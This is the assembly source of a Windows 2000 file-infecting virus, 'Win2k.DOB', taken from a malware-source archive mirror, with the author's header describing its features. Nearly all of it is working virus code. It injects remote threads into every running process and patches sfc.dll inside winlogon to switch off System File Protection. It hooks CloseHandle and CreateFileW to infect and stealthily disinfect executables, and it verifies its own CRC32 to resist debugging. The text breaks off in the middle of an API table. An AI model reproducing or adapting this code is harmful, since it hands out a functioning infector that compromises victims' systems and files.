mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-18 16:25:28 +00:00
1063 lines
24 KiB
NASM
1063 lines
24 KiB
NASM
|
||
COMMENT#
|
||
|
||
Ú¿
|
||
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
|
||
ÃÅÅÅÅÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÅÅÅÅ´
|
||
ÃÅÅÅ´ Win2k.DOB ÃÅÅÅ´
|
||
ÃÅÅÅ´ by Benny/29A ÃÅÅÅ´
|
||
ÃÅÅÅÅÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÂÅÅÅÅ´
|
||
ÃÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ´
|
||
ÀÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÁÙ
|
||
|
||
|
||
|
||
Hello dear reader,
|
||
|
||
here is my another Win2k infector. This one is multi-process resident and featurez
|
||
some small kind of stealth and runtime SFP disabling! The main viral code worx with
|
||
all processes in the system and tries to inflitrate them. IF the process in
|
||
winlogon.exe, it createz remote thread which will overwrite code that handlez System
|
||
File Protection in Windows 2000. There's no need to restart computer, from the
|
||
execution ALL filez protected by SFP are now unprotected! I used the same method
|
||
which is described in article about SFC disabling in 29A-6 magazine. I have to
|
||
mentioned that this code is coded by me and also Ratter of 29A.
|
||
|
||
In the case the found process is not winlogon.exe it triez to create remote thread
|
||
which will hook CloseHandle and CreateFileW APIZ there. The mentioned semi-stealth
|
||
mechanism worx in this way - when infected program tries to open infected file with
|
||
CreateFileW API, virus will disinfect it and pass the execution to the API and host.
|
||
When host program tries to close file by CloseHandle API, virus will try to infect
|
||
it by my favourite method - overwritting of relocation section. I had this semi-stealth
|
||
mechanism (semi becoz infection via CloseHandle doesnt always work - file is not alwayz
|
||
opened with all required access rightz so many timez the infection will fail - and for now
|
||
I dont know how to recieve filename from HANDLE by Win2k compatible way. If anyone knows
|
||
it, pleaz gimme know!) for long yearz in my head. Originaly I wanted to implement it
|
||
in Win32.Vulcano, but I was so lazy... I decided to code it now, well I know its a bit
|
||
later, but better later than never :)
|
||
|
||
Virus also chex its own integrity on the start (by CRC32) so in the case someone set
|
||
some breakpointz in the viral code, virus will not run.
|
||
|
||
I didnt test Win2k.DOB very deeply, so it is possible that it has some bugz. However,
|
||
again I didnt code it for spreading, but to show some new ideaz. I hope you will like
|
||
this virus...
|
||
|
||
|
||
(c)oded in September, 2001
|
||
Czech Republic.
|
||
#
|
||
|
||
|
||
.386p
|
||
.model flat
|
||
|
||
include win32api.inc
|
||
include useful.inc
|
||
include mz.inc
|
||
include pe.inc
|
||
|
||
|
||
invoke macro api ;macro for API callz
|
||
extrn api:PROC ;declare API
|
||
call api ;call it...
|
||
endm
|
||
|
||
|
||
@SEH_SetupFrame_UnProtect macro
|
||
local set_new_eh
|
||
local exception_handler
|
||
local @n
|
||
|
||
call set_new_eh
|
||
pushad
|
||
|
||
mov ebx,dword ptr [esp+cPushad+EH_ExceptionRecord]
|
||
cmp dword ptr [ebx.ER_ExceptionCode],EXCEPTION_ACCESS_VIOLATION
|
||
jne exception_handler
|
||
|
||
call @n
|
||
dd ?
|
||
@n: mov ebx,[ebx.ER_ExceptionInformation+4]
|
||
push PAGE_READWRITE
|
||
and ebx,0FFFFF000h
|
||
push 2*4096
|
||
push ebx
|
||
mov eax,12345678h
|
||
_VirtualProtect = dword ptr $-4
|
||
call eax ;unprotect 2 pagez
|
||
|
||
exception_handler:
|
||
popad
|
||
xor eax,eax
|
||
ret
|
||
|
||
set_new_eh: ;set SEH frame
|
||
xor edx,edx
|
||
push dword ptr fs:[edx]
|
||
mov fs:[edx],esp
|
||
endm
|
||
|
||
|
||
.data
|
||
|
||
|
||
;this is the remote thread that getz executed in infected process
|
||
|
||
rtStart Proc
|
||
pushad
|
||
tdelta = $+5
|
||
@SEH_SetupFrame <jmp end_thread>
|
||
|
||
mov ebp,[esp+4] ;EBP = delta offset
|
||
|
||
;hook 2 APIz - CloseHandle and CreateFileW
|
||
|
||
mov esi,12345678h
|
||
_CloseHandle = dword ptr $-4
|
||
cmp [esi],64EC8B55h ;check CloseHandle API...
|
||
jne try_cfw
|
||
cmp dword ptr [esi+4],000018A1h ;...code
|
||
jne try_cfw
|
||
mov eax,esi
|
||
neg esi
|
||
add esi,newCloseHandle-rtStart-5
|
||
add esi,12345678h
|
||
virus_base = dword ptr $-4
|
||
mov byte ptr [eax],0E9h ;create "JMP <virus>"
|
||
mov [eax+1],esi
|
||
mov [eax+5],90909090h ;fill with NOPs
|
||
add eax,9
|
||
mov [ebp + nextCH - tdelta],eax ;save the address
|
||
|
||
;and do the same for CreateFileW API
|
||
|
||
try_cfw:mov esi,12345678h
|
||
_CreateFileW = dword ptr $-4
|
||
cmp [esi],83EC8B55h
|
||
jne end_thread
|
||
cmp word ptr [esi+4],5CECh
|
||
jne end_thread
|
||
mov eax,esi
|
||
neg esi
|
||
add esi,newCreateFileW-rtStart-5
|
||
add esi,[ebp + virus_base - tdelta]
|
||
mov byte ptr [eax],0E9h
|
||
mov [eax+1],esi
|
||
mov byte ptr [eax+5],90h
|
||
add eax,6
|
||
mov [ebp + nextCFW - tdelta],eax
|
||
|
||
end_thread:
|
||
@SEH_RemoveFrame
|
||
popad
|
||
ret
|
||
|
||
|
||
;hooker for CreateFileW - disinfectz opened file from virus
|
||
|
||
newCreateFileW:
|
||
pushad
|
||
call @oldCFW
|
||
|
||
cdelta = $
|
||
bytez_CreateFileW:
|
||
push ebp ;overwritten code
|
||
mov ebp,esp
|
||
sub esp,5Ch
|
||
push 12345678h ;return address
|
||
nextCFW = dword ptr $-4
|
||
ret
|
||
|
||
@oldCFW:pop ebp ;EBP = delta offset
|
||
|
||
mov ecx,12345678h
|
||
semaphore = dword ptr $-4
|
||
jecxz c_cfw
|
||
xor eax,eax
|
||
and [ebp + semaphore - cdelta],eax
|
||
|
||
call disinfect ;try to disinfect the file
|
||
mov [ebp + semaphore - cdelta],ebp
|
||
c_cfw: popad
|
||
jmp bytez_CreateFileW ;and run the previous code
|
||
|
||
|
||
;hooker for CloseHandle - infectz file which's getting closed
|
||
|
||
newCloseHandle:
|
||
pushad
|
||
call @oldCH
|
||
|
||
hdelta = $
|
||
bytez_CloseHandle:
|
||
push ebp ;overwritten code
|
||
mov ebp,esp
|
||
mov eax,LARGE fs:[18h]
|
||
push 12345678h ;return address
|
||
nextCH = dword ptr $-4
|
||
ret
|
||
|
||
@oldCH: pop ebp ;EBP = delta offset
|
||
|
||
mov ecx,[ebp + semaphore - hdelta]
|
||
jecxz c_ch
|
||
and dword ptr [ebp + semaphore - hdelta],0
|
||
|
||
call tryInfect ;try to infect
|
||
mov [ebp + semaphore - hdelta],ebp
|
||
c_ch: popad
|
||
jmp bytez_CloseHandle ;and run the previous code
|
||
|
||
|
||
tryInfect:
|
||
mov ebx,[esp.cPushad+8] ;get the handle
|
||
push ebx
|
||
mov eax,12345678h
|
||
_GetFileType = dword ptr $-4
|
||
call eax
|
||
dec eax
|
||
je c_ti ;must be FILE_TYPE_DISK
|
||
end_ti: ret
|
||
|
||
c_ti: push eax
|
||
push eax
|
||
push eax
|
||
push PAGE_READWRITE
|
||
push eax
|
||
push ebx
|
||
mov eax,12345678h
|
||
_CreateFileMappingA = dword ptr $-4
|
||
call eax ;map the file
|
||
cdq
|
||
xchg eax,ecx
|
||
jecxz end_ti
|
||
mov [ebp + hFile - hdelta],ecx
|
||
|
||
push edx
|
||
push edx
|
||
push edx
|
||
push FILE_MAP_WRITE
|
||
push ecx
|
||
mov eax,12345678h
|
||
_MapViewOfFile = dword ptr $-4
|
||
call eax ;--- " " ---
|
||
test eax,eax
|
||
je close_file
|
||
xchg eax,ebx
|
||
mov [ebp + lpFile - hdelta],ebx
|
||
jmp n_open
|
||
|
||
unmap_file:
|
||
push 12345678h
|
||
lpFile = dword ptr $-4
|
||
mov eax,12345678h
|
||
_UnmapViewOfFile = dword ptr $-4
|
||
call eax ;unmap the file
|
||
close_file:
|
||
push 12345678h
|
||
hFile = dword ptr $-4
|
||
call [ebp + _CloseHandle - hdelta] ;--- " " ---
|
||
ret
|
||
|
||
|
||
n_open: mov esi,[ebx.MZ_lfanew]
|
||
add esi,ebx
|
||
mov eax,[esi]
|
||
add eax,-IMAGE_NT_SIGNATURE
|
||
jne unmap_file ;must be PE file
|
||
|
||
;discard not_executable and system filez
|
||
cmp word ptr [esi.NT_FileHeader.FH_Machine],IMAGE_FILE_MACHINE_I386
|
||
jne unmap_file
|
||
mov ax,[esi.NT_FileHeader.FH_Characteristics]
|
||
test ax,IMAGE_FILE_EXECUTABLE_IMAGE
|
||
je unmap_file
|
||
test ax,IMAGE_FILE_DLL
|
||
jne unmap_file
|
||
test ax,IMAGE_FILE_SYSTEM
|
||
jne unmap_file
|
||
mov al,byte ptr [esi.NT_FileHeader.OH_Subsystem]
|
||
test al,IMAGE_SUBSYSTEM_NATIVE
|
||
jne unmap_file
|
||
|
||
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
|
||
dec eax
|
||
test eax,eax
|
||
je unmap_file
|
||
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
|
||
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
|
||
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
|
||
add edi,esi
|
||
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
|
||
mov eax,[edx]
|
||
test eax,eax
|
||
je unmap_file
|
||
cmp eax,[edi.SH_VirtualAddress]
|
||
jne unmap_file
|
||
cmp [edi.SH_SizeOfRawData],virtual_end-rtStart
|
||
jb unmap_file ;is it large enough?
|
||
|
||
pushad
|
||
xor eax,eax
|
||
mov edi,edx
|
||
stosd
|
||
stosd
|
||
popad ;erase relocs record
|
||
|
||
;align the section size
|
||
mov eax,virtual_end-rtStart
|
||
cmp eax,[edi.SH_VirtualSize]
|
||
jb o_vs
|
||
mov ecx,[esi.NT_OptionalHeader.OH_SectionAlignment]
|
||
cdq
|
||
div ecx
|
||
test edx,edx
|
||
je o_al
|
||
inc eax
|
||
o_al: mul ecx
|
||
mov [edi.SH_VirtualSize],eax
|
||
|
||
o_vs: push dword ptr [ebp + original_ep - hdelta]
|
||
|
||
mov eax,[esi.NT_OptionalHeader.OH_AddressOfEntryPoint]
|
||
mov ecx,[edi.SH_VirtualAddress]
|
||
add ecx,Start-rtStart
|
||
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],ecx
|
||
mov [ebp + original_ep - hdelta],eax
|
||
mov eax,[esi.NT_OptionalHeader.OH_ImageBase]
|
||
add [ebp + original_ep - hdelta],eax
|
||
;set saved_entrypoint variable
|
||
pushad
|
||
mov edi,[edi.SH_PointerToRawData]
|
||
add edi,ebx
|
||
lea esi,[ebp + rtStart - hdelta]
|
||
mov ecx,(virtual_end-rtStart+3)/4
|
||
rep movsd ;overwrite relocs by virus body
|
||
popad
|
||
pop dword ptr [ebp + original_ep - hdelta]
|
||
;restore used variablez
|
||
or dword ptr [edi.SH_Characteristics],IMAGE_SCN_MEM_WRITE
|
||
jmp unmap_file
|
||
|
||
|
||
disinfect:
|
||
push eax
|
||
push FILE_ATTRIBUTE_NORMAL
|
||
push OPEN_EXISTING
|
||
push eax
|
||
push FILE_SHARE_READ
|
||
push GENERIC_READ or GENERIC_WRITE
|
||
push dword ptr [esp.cPushad+32]
|
||
call [ebp + _CreateFileW - cdelta] ;open the file
|
||
inc eax
|
||
jne c_di
|
||
ret
|
||
|
||
c_di: dec eax
|
||
mov [ebp + cFile - cdelta],eax
|
||
cdq
|
||
xor edx,edx
|
||
push edx
|
||
push edx
|
||
push edx
|
||
push PAGE_READWRITE
|
||
push edx
|
||
push eax
|
||
call [ebp + _CreateFileMappingA - cdelta] ;create file mapping
|
||
cdq
|
||
xchg eax,ecx
|
||
jecxz c_close_file
|
||
mov [ebp + cMapFile - cdelta],ecx
|
||
|
||
push edx
|
||
push edx
|
||
push edx
|
||
push FILE_MAP_WRITE
|
||
push ecx
|
||
call [ebp + _MapViewOfFile - cdelta] ;map to address space
|
||
test eax,eax
|
||
je c_close_file2
|
||
xchg eax,ebx
|
||
mov [ebp + clpFile - cdelta],ebx
|
||
jmp n_copen
|
||
|
||
c_unmap_file:
|
||
push 12345678h
|
||
clpFile = dword ptr $-4
|
||
call [ebp + _UnmapViewOfFile - cdelta] ;unmap file
|
||
c_close_file2:
|
||
push 12345678h
|
||
cMapFile = dword ptr $-4
|
||
call [ebp + _CloseHandle - cdelta] ;close file mapping
|
||
c_close_file:
|
||
push 12345678h
|
||
cFile = dword ptr $-4
|
||
call [ebp + _CloseHandle - cdelta] ;and the file itself
|
||
ret
|
||
|
||
n_copen:mov esi,[ebx.MZ_lfanew]
|
||
add esi,ebx
|
||
mov eax,[esi]
|
||
add eax,-IMAGE_NT_SIGNATURE
|
||
jne c_unmap_file ;must be PE file
|
||
|
||
movzx eax,word ptr [esi.NT_FileHeader.FH_NumberOfSections]
|
||
dec eax
|
||
test eax,eax
|
||
je unmap_file
|
||
imul eax,eax,IMAGE_SIZEOF_SECTION_HEADER
|
||
movzx edx,word ptr [esi.NT_FileHeader.FH_SizeOfOptionalHeader]
|
||
lea edi,[eax+edx+IMAGE_SIZEOF_FILE_HEADER+4]
|
||
add edi,esi
|
||
cmp [edi],'ler.'
|
||
jne c_unmap_file
|
||
cmp dword ptr [edi+4],'co'
|
||
jne c_unmap_file ;must be ".reloc"
|
||
lea edx,[esi.NT_OptionalHeader.OH_DataDirectory.DE_BaseReloc.DD_VirtualAddress]
|
||
xor ecx,ecx
|
||
cmp [edx],ecx
|
||
jne c_unmap_file ;must be NULL
|
||
mov eax,[edi.SH_VirtualAddress]
|
||
mov [edx],eax ;restore the address field
|
||
mov eax,[edi.SH_VirtualSize]
|
||
mov [edx+4],eax ;and the size field
|
||
xchg eax,ecx
|
||
|
||
mov ecx,[edi.SH_SizeOfRawData]
|
||
mov edi,[edi.SH_PointerToRawData]
|
||
add edi,ebx
|
||
|
||
pushad
|
||
push esi
|
||
mov esi,edi
|
||
lea edi,[ebp + end_seh - cdelta]
|
||
mov ecx,original_ep-end_seh
|
||
l_ep: pushad
|
||
rep cmpsb
|
||
popad
|
||
je got_ep
|
||
inc esi
|
||
jmp l_ep
|
||
got_ep: add esi,original_ep-end_seh ;find the saved entrypoint in virus body
|
||
lodsd
|
||
pop esi
|
||
sub eax,[esi.NT_OptionalHeader.OH_ImageBase]
|
||
mov [esi.NT_OptionalHeader.OH_AddressOfEntryPoint],eax
|
||
popad ;restore it
|
||
rep stosb ;and overwrite body with NULLs
|
||
|
||
jmp c_unmap_file
|
||
|
||
rtStart EndP
|
||
|
||
|
||
signature db 0,'[Win2k.DOB], multi-process stealth project by Benny/29A',0
|
||
;little signature ;-)
|
||
|
||
|
||
; !!! VIRAL CODE STARTS HERE !!!
|
||
|
||
Start: pushad
|
||
gdelta = $+5
|
||
@SEH_SetupFrame <jmp end_seh> ;setup SEH frame
|
||
|
||
call check_crc32 ;check viral body consistency
|
||
|
||
protected:
|
||
mov ebp,[esp+4] ;EBP = delta offset
|
||
|
||
mov edx,cs
|
||
xor dl,dl
|
||
jne end_seh ;must be under winNT/2k!
|
||
|
||
call get_base ;get K32 base address
|
||
call get_apiz ;find addresses of APIz
|
||
call advapi_apiz ;get ADVAPI32 apiz
|
||
call psapi_apiz ;get PSAPI apiz
|
||
|
||
mov eax,12345678h
|
||
_GetCurrentProcess = dword ptr $-4
|
||
call eax ;get current process pseudohandle
|
||
lea ecx,[ebp + p_token - gdelta]
|
||
push ecx
|
||
push 20h
|
||
push eax
|
||
mov eax,12345678h
|
||
_OpenProcessToken = dword ptr $-4 ;open token of our process
|
||
call eax
|
||
dec eax
|
||
jne err_ap
|
||
|
||
lea ecx,[ebp + p_luid - gdelta]
|
||
push ecx
|
||
@pushsz 'SeDebugPrivilege'
|
||
push eax
|
||
mov eax,12345678h
|
||
_LookupPrivilegeValueA = dword ptr $-4 ;find LUID for this priv.
|
||
call eax
|
||
dec eax
|
||
jne err_ap
|
||
|
||
lea ecx,[ebp + token_priv - gdelta]
|
||
push eax
|
||
push eax
|
||
push 10h
|
||
push ecx
|
||
push eax
|
||
push dword ptr [ebp + p_token - gdelta]
|
||
mov eax,12345678h
|
||
_AdjustTokenPrivileges = dword ptr $-4
|
||
call eax ;adjust higher priviledges
|
||
;for our process ;-)
|
||
err_ap: lea esi,[ebp + procz - gdelta]
|
||
lea eax,[ebp + tmp - gdelta]
|
||
push eax
|
||
push 80h
|
||
push esi
|
||
mov eax,12345678h
|
||
_EnumProcesses = dword ptr $-4
|
||
call eax ;enumerate all running processes
|
||
dec eax
|
||
jne end_seh
|
||
add esi,4
|
||
|
||
p_search:
|
||
lodsd ;get PID
|
||
test eax,eax
|
||
je end_ps
|
||
call analyse_process ;and try to infect it
|
||
jmp p_search
|
||
|
||
end_ps: push 12345678h
|
||
_advapi32 = dword ptr $-4
|
||
mov esi,12345678h
|
||
_FreeLibrary = dword ptr $-4
|
||
call esi
|
||
push 12345678h
|
||
_psapi = dword ptr $-4
|
||
call esi ;free ADVAPI32 and PSAPI libz
|
||
end_seh:@SEH_RemoveFrame ;remove SEH frame
|
||
popad
|
||
|
||
extrn ExitProcess:PROC
|
||
push cs
|
||
push offset ExitProcess
|
||
original_ep = dword ptr $-4
|
||
retf ;jump to host!
|
||
|
||
|
||
analyse_process Proc
|
||
pushad
|
||
push eax
|
||
push 0
|
||
push 43Ah
|
||
mov eax,12345678h
|
||
_OpenProcess = dword ptr $-4
|
||
call eax ;PID -> handle
|
||
test eax,eax
|
||
je end_ap
|
||
mov [ebp + hProcess - gdelta],eax
|
||
push eax
|
||
|
||
push eax
|
||
lea esi,[ebp + modz - gdelta]
|
||
lea ecx,[ebp + tmp - gdelta]
|
||
push ecx
|
||
push 4
|
||
push esi
|
||
push eax
|
||
mov eax,12345678h
|
||
_EnumProcessModules = dword ptr $-4
|
||
call eax ;get first (main) module
|
||
pop ecx
|
||
dec eax
|
||
jne end_ap1
|
||
|
||
lodsd
|
||
lea edi,[ebp + mod_name - gdelta]
|
||
push MAX_PATH
|
||
push edi
|
||
push eax
|
||
push ecx
|
||
mov eax,12345678h
|
||
_GetModuleBaseNameA = dword ptr $-4
|
||
call eax ;get its name
|
||
xchg eax,ecx
|
||
test ecx,ecx
|
||
je end_ap1
|
||
|
||
@pushsz 'winlogon.exe'
|
||
pop esi
|
||
mov ebx,edi
|
||
pushad
|
||
rep cmpsb
|
||
popad
|
||
je r_winlogon ;is it winlogon?
|
||
|
||
;nope, try to infect the process
|
||
|
||
lea esi,[ebp + rtStart - gdelta]
|
||
mov edi,virtual_end-rtStart
|
||
call r_create_thread
|
||
jmp end_ap1
|
||
|
||
r_winlogon:
|
||
|
||
;yeah, disable SFP!
|
||
|
||
lea esi,[ebp + winlogon_start_rroutine - gdelta]
|
||
mov edi,winlogon_end_rroutine-winlogon_start_rroutine
|
||
call r_create_thread
|
||
|
||
end_ap1:call [ebp + _CloseHandle - gdelta]
|
||
end_ap: popad
|
||
ret
|
||
analyse_process EndP
|
||
|
||
|
||
;this proc createz remote thread
|
||
|
||
r_create_thread Proc
|
||
push PAGE_READWRITE
|
||
push MEM_RESERVE or MEM_COMMIT
|
||
push edi
|
||
push 0
|
||
push 12345678h
|
||
hProcess = dword ptr $-4
|
||
mov eax,12345678h
|
||
_VirtualAllocEx = dword ptr $-4
|
||
call eax ;aloc there a memory
|
||
test eax,eax
|
||
je err_rcr
|
||
xchg eax,ebx
|
||
mov [ebp + virus_base - gdelta],ebx
|
||
|
||
push 0
|
||
push edi
|
||
push esi
|
||
push ebx
|
||
push dword ptr [ebp + hProcess - gdelta]
|
||
mov eax,12345678h
|
||
_WriteProcessMemory = dword ptr $-4
|
||
call eax ;write there our code
|
||
dec eax
|
||
jne free_mem
|
||
|
||
lea ecx,[ebp + tmp - gdelta]
|
||
push ecx
|
||
push PAGE_READWRITE
|
||
push 1
|
||
push dword ptr [ebp + _CloseHandle - gdelta]
|
||
push dword ptr [ebp + hProcess - gdelta]
|
||
mov eax,12345678h
|
||
_VirtualProtectEx = dword ptr $-4
|
||
call eax ;unprotect first CloseHandle API page
|
||
dec eax
|
||
jne free_mem
|
||
|
||
lea ecx,[ebp + tmp - gdelta]
|
||
push ecx
|
||
push PAGE_READWRITE
|
||
push 1
|
||
push dword ptr [ebp + _CreateFileW - gdelta]
|
||
push dword ptr [ebp + hProcess - gdelta]
|
||
call [ebp + _VirtualProtectEx - gdelta] ;unprotect first CreateFileW API page
|
||
dec eax
|
||
jne free_mem
|
||
|
||
xor edx,edx
|
||
push edx
|
||
push edx
|
||
push edx
|
||
push ebx
|
||
push edx
|
||
push edx
|
||
push dword ptr [ebp + hProcess - gdelta]
|
||
mov eax,12345678h
|
||
_CreateRemoteThread = dword ptr $-4
|
||
call eax ;run remote thread!
|
||
push eax
|
||
call [ebp + _CloseHandle - gdelta]
|
||
err_rcr:ret
|
||
free_mem:
|
||
push MEM_RELEASE
|
||
push 0
|
||
push ebx
|
||
push dword ptr [ebp + hProcess - gdelta]
|
||
mov eax,12345678h
|
||
_VirtualFreeEx = dword ptr $-4
|
||
call eax ;free memory
|
||
ret
|
||
r_create_thread EndP
|
||
|
||
|
||
winlogon_start_rroutine Proc
|
||
pushad
|
||
|
||
@SEH_SetupFrame_UnProtect ;set SEH frame
|
||
|
||
@pushsz 'sfc.dll'
|
||
mov eax,12345678h
|
||
_GetModuleHandleA = dword ptr $-4
|
||
call eax ;get sfc.dll address
|
||
test eax,eax
|
||
je end_rseh
|
||
xchg eax,esi
|
||
|
||
mov eax,[esi.MZ_lfanew]
|
||
add eax,esi
|
||
movzx edx,word ptr [eax.NT_FileHeader.FH_SizeOfOptionalHeader]
|
||
lea edx,[edx+eax+(3*IMAGE_SIZEOF_FILE_HEADER)]
|
||
mov ecx,[edx.SH_SizeOfRawData] ;get size of section
|
||
|
||
call @s_str
|
||
@b_str: db 0FFh,15h,8Ch,12h,93h,76h ;code to search & patch
|
||
db 85h,0C0h
|
||
db 0Fh,8Ch,0F1h,00h,00h,00h
|
||
db 0Fh,84h,0EBh,00h,00h,00h
|
||
db 3Dh,02h,01h,00h,00h
|
||
@s_str: pop edi
|
||
s_str: pushad
|
||
push @s_str-@b_str
|
||
pop ecx
|
||
rep cmpsb ;search for code
|
||
popad
|
||
je got_addr
|
||
inc esi
|
||
loop s_str
|
||
jmp end_rseh
|
||
|
||
got_addr:
|
||
call e_next
|
||
|
||
s_next: push 0 ;"patch" code
|
||
mov eax,12345678h
|
||
_ExitThread = dword ptr $-4
|
||
call eax
|
||
|
||
e_next: pop edi
|
||
xchg esi,edi
|
||
add edi,6
|
||
mov ecx,e_next-s_next
|
||
rep movsb ;patch sfc.dll code by our code
|
||
|
||
end_rseh:
|
||
@SEH_RemoveFrame
|
||
popad
|
||
ret ;and quit
|
||
|
||
winlogon_end_rroutine:
|
||
winlogon_start_rroutine EndP
|
||
|
||
|
||
|
||
;this procedure can retrieve base address of K32
|
||
get_base Proc
|
||
mov eax,077E80000h ;get lastly used address
|
||
last_kern = dword ptr $-4
|
||
call check_kern ;is this address valid?
|
||
jecxz end_gb ;yeah, we got the address
|
||
|
||
call gb_table ;jump over the address table
|
||
dd 077E00000h ;NT/W2k
|
||
dd 077E80000h ;NT/W2k
|
||
dd 077ED0000h ;NT/W2k
|
||
dd 077F00000h ;NT/W2k
|
||
dd 0BFF70000h ;95/98
|
||
gb_table:
|
||
pop edi ;get pointer to address table
|
||
push 4 ;get number of items in the table
|
||
pop esi ;to ESI
|
||
gbloop: mov eax,[edi+esi*4] ;get item
|
||
call check_kern ;is address valid?
|
||
jecxz end_gb ;yeah, we got the valid address
|
||
dec esi ;decrement ESI
|
||
test esi,esi ;end of table?
|
||
jne gbloop ;nope, try next item
|
||
|
||
call scan_kern ;scan the address space for K32
|
||
end_gb: ret ;quit
|
||
|
||
check_kern: ;check if K32 address is valid
|
||
mov ecx,eax ;make ECX != 0
|
||
pushad ;store all registers
|
||
@SEH_SetupFrame <jmp end_ck> ;setup SEH frame
|
||
movzx edx,word ptr [eax] ;get two bytes
|
||
add edx,-"ZM" ;is it MZ header?
|
||
jne end_ck ;nope
|
||
mov ebx,[eax.MZ_lfanew] ;get pointer to PE header
|
||
add ebx,eax ;normalize it
|
||
mov ebx,[ebx] ;get four bytes
|
||
add ebx,-"EP" ;is it PE header?
|
||
jne end_ck ;nope
|
||
xor ecx,ecx ;we got K32 base address
|
||
mov [ebp + last_kern - gdelta],eax ;save K32 base address
|
||
end_ck: @SEH_RemoveFrame ;remove SEH frame
|
||
mov [esp.Pushad_ecx],ecx ;save ECX
|
||
popad ;restore all registers
|
||
ret ;if ECX == 0, address was found
|
||
|
||
SEH_hndlr macro ;macro for SEH
|
||
@SEH_RemoveFrame ;remove SEH frame
|
||
popad ;restore all registers
|
||
add dword ptr [ebp + bAddr - gdelta],1000h ;explore next page
|
||
jmp bck ;continue execution
|
||
endm
|
||
|
||
scan_kern: ;scan address space for K32
|
||
bck: pushad ;store all registers
|
||
@SEH_SetupFrame <SEH_hndlr> ;setup SEH frame
|
||
mov eax,077000000h ;starting/last address
|
||
bAddr = dword ptr $-4
|
||
movzx edx,word ptr [eax] ;get two bytes
|
||
add edx,-"ZM" ;is it MZ header?
|
||
jne pg_flt ;nope
|
||
mov edi,[eax.MZ_lfanew] ;get pointer to PE header
|
||
add edi,eax ;normalize it
|
||
mov ebx,[edi] ;get four bytes
|
||
add ebx,-"EP" ;is it PE header?
|
||
jne pg_flt ;nope
|
||
mov ebx,eax
|
||
mov esi,eax
|
||
add ebx,[edi.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
|
||
add esi,[ebx.ED_Name]
|
||
mov esi,[esi]
|
||
add esi,-'NREK'
|
||
je end_sk
|
||
pg_flt: xor ecx,ecx ;we got K32 base address
|
||
mov [ecx],esi ;generate PAGE FAULT! search again...
|
||
end_sk: mov [ebp + last_kern - gdelta],eax ;save K32 base address
|
||
@SEH_RemoveFrame ;remove SEH frame
|
||
mov [esp.Pushad_eax],eax ;save EAX - K32 base
|
||
popad ;restore all registers
|
||
ret
|
||
get_base EndP
|
||
|
||
|
||
get_apiz Proc
|
||
mov esi,eax ;base of K32
|
||
mov edx,[esi.MZ_lfanew]
|
||
add edx,esi
|
||
mov ebx,[edx.NT_OptionalHeader.OH_DirectoryEntries.DE_Export.DD_VirtualAddress]
|
||
add ebx,esi
|
||
mov ecx,[ebx.ED_NumberOfNames]
|
||
mov edx,[ebx.ED_AddressOfNames]
|
||
add edx,esi
|
||
|
||
xor eax,eax
|
||
c_find: pushad
|
||
add esi,[edx+eax*4]
|
||
push esi
|
||
@endsz
|
||
mov edi,esi
|
||
pop esi
|
||
sub edi,esi
|
||
call CRC32 ;calculate CRC32 of the API
|
||
|
||
push n_apiz ;number of apiz
|
||
pop ecx
|
||
|
||
call @callz
|
||
s_apiz: dd 082B618D4h ;GetModuleHandleA
|
||
dd 04134D1ADh ;LoadLibraryA
|
||
dd 0AFDF191Fh ;FreeLibrary
|
||
dd 0FFC97C1Fh ;GetProcAddress
|
||
dd 079C3D4BBh ;VirtualProtect
|
||
dd 0058F9201h ;ExitThread
|
||
dd 003690E66h ;GetCurrentProcess
|
||
dd 033D350C4h ;OpenProcess
|
||
dd 0DA89FC22h ;VirtualAllocEx
|
||
dd 00E9BBAD5h ;WriteProcessMemory
|
||
dd 0CF4A7F65h ;CreateRemoteThread
|
||
dd 0700ED6DFh ;VirtualFreeEx
|
||
dd 068624A9Dh ;CloseHandle
|
||
dd 056E1B657h ;VirtualProtectEx
|
||
dd 000D38F42h ;GetFileType
|
||
dd 096B2D96Ch ;CreateFileMappingA
|
||
dd 0797B49ECh ;MapViewOfFile
|
||
dd 094524B42h ;UnmapViewOfFile
|
||
dd 090119808h ;CreateFileW
|
||
n_apiz = ($-s_apiz)/4
|
||
@callz: pop edx
|
||
|
||
c_look: cmp [edx-4+(ecx*4)],eax ;is it our API?
|
||
je got_call ;yeah
|
||
loop c_look ;nope, look for another API in our table
|
||
c_out: popad
|
||
inc eax
|
||
loop c_find
|
||
ret
|
||
|
||
got_call:
|
||
mov edx,[ebx.ED_AddressOfOrdinals]
|
||
mov esi,[esp.Pushad_esi]
|
||
add edx,esi
|
||
mov eax,[esp.Pushad_eax]
|
||
movzx eax,word ptr [edx+eax*2]
|
||
mov edx,esi
|
||
add edx,[ebx.ED_AddressOfFunctions]
|
||
mov eax,[edx+eax*4]
|
||
add eax,esi
|
||
|
||
lea edx,[ebp + Start - gdelta]
|
||
add edx,[ebp + api_addr-4+ecx*4 - gdelta]
|
||
mov [edx],eax ;save it
|
||
jmp c_out
|
||
get_apiz EndP
|
||
|
||
|
||
api_addr: ;where to save apiz numberz...
|
||
dd offset _GetModuleHandleA-Start
|
||
dd offset _LoadLibraryA-Start
|
||
dd offset _FreeLibrary-Start
|
||
dd offset _GetProcAddress-Start
|
||
dd offset _VirtualProtect-Start
|
||
dd offset _ExitThread-Start
|
||
dd offset _GetCurrentProcess-Start
|
||
dd offset _OpenProcess-Start
|
||
dd offset _VirtualAllocEx-Start
|
||
dd offset _WriteProcessMemory-Start
|
||
dd offset _CreateRemoteThread-Start
|
||
dd offset _VirtualFreeEx-Start
|
||
dd offset _CloseHandle-Start
|
||
dd offset _VirtualProtectEx-Start
|
||
dd offset _GetFileType-Start
|
||
